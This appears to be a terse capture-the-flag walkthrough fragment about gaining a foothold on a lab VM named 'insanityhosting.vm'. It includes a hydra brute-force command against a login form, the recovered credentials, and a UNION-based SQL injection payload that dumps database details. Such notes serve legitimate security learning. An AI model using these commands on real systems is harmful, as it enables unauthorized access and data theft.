Foothold

http://192.168.199.124/news/
❯ echo 192.168.199.124 insanityhosting.vm | sudo tee -a /etc/hosts
http://192.168.199.124/monitoring/login.php
❯ hydra -I -vV -f -l otis -P ~/opt/1000_pwd.txt 'http-post-form://192.168.199.124/monitoring/login.php:username=^USER^&password=^PASS^:C=/:F=302'

otis:123456

Will come into play

http://insanityhosting.vm/webmail/src/login.php
otis:123456

Exploit didn't work, so trying SQL injection instead

Tried again with "

Gives us the whole DB

" union select 1,@@version,@@hostname,4,5 -- -
